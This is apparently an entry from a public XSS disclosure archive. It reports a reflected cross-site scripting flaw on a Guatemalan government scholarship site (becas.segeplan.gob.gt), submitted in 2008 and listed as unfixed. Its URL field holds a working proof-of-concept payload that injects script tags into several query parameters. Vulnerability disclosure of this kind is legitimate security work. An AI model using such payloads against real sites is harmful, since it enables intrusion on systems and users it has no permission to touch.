Security researcher sl4xUz, has submitted on 04/09/2008 a cross-site-scripting (XSS) vulnerability affecting becas.segeplan.gob.gt, which at the time of submission ranked 277892 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/09/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/09/2008 |
Date published: 24/09/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: sl4xUz |
Domain: becas.segeplan.gob.gt |
Category: XSS |
Pagerank: 277892 |
URL: http://becas.segeplan.gob.gt/becas/listado_convocatoria.php?tipo=0&codigo=%3Cscript%3Ealert(/xssed!/ );%3C/script%3E&nombre_fuente=%3E&pais=%3Cscript%3Ealert(/xssed!+2/);%3C/script%3E&sede=%3Cscript%3E alert(/xssed!+3/);%3C/script%3E&nombre=%3Cscript%3Ealert(/im+bored+:[/);%3C/script%3E&descripcion=%3 Cscript%3Ealert(/this+is+fun+^^/);%3C/script%3E%0D%0A%22%3E%0D%0A |
Click here to view the mirror
|
|
|